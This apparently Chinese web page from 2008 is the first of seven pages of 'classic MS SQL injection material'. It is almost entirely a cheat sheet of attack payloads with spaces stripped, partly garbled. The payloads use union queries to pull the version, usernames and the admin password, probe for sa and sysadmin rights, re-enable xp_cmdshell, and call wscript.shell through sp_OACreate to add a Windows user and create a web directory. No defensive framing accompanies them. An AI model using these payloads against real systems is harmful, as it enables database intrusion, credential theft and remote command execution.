非常经典的Ms Sql注射资料

　2008-10-04 11:10:32　来源：WEB开发网　　　

核心提示： 'unionselect@@version,1,1,1--and1=(select@@VERSION)and'sa'=(selectSystem_user)'unionselectret,1,1,1fromfoo--'unionselectmin(u

'unionselect@@version,1,1,1-- and1=(select@@VERSION) and'sa'=(selectSystem_user) 'unionselectret,1,1,1fromfoo-- 'unionselectmin(username),1,1,1fromuserswhereusername>'a'- 'unionselectmin(username),1,1,1fromuserswhereusername>'admin'- 'unionselectpassword,1,1,1fromuserswhereusername='admin'-- anduser_name()='dbo' and0<>(selectuser_name()- ;DECLARE@shellINTEXECSP_OAcreate'wscript.shell',@shellOUTPUTEXECSP_OAMETHOD@shell,'run',null,'C：WINNTsystem32cmd.exe/cnetuserswap5245886/add' and1=(selectcount(*)FROMmaster.dbo.sysobjectswherextype='X'ANDname='xp_cmdshell') ;EXECmaster.dbo.sp_addextendedproc'xp_cmdshell','xplog70.dll' 1=(%20select%20count(*)%20from%20master.dbo.sysobjects%20where%20xtype='x'%20and%20name='xp_cmdshell') and1=(selectIS_SRVROLEMEMBER('sysadmin'))判断sa权限是否 and0<>(selecttop1pathsfromnewtable)--暴库大法 and1=(selectnamefrommaster.dbo.sysdatabaseswheredbid=7)得到库名（从1到5都是系统的id，6以上才可以判断）创建一个虚拟目录E盘：

declare@ointexecsp_oacreate'wscript.shell',@ooutexecsp_oamethod@o,'run',NULL,'cscript.exec：inetpubwwwrootmkwebdir.vbs-w"默认Web站点"-v"e","e："'

上一页 1 2 3 4 5 6 7 下一页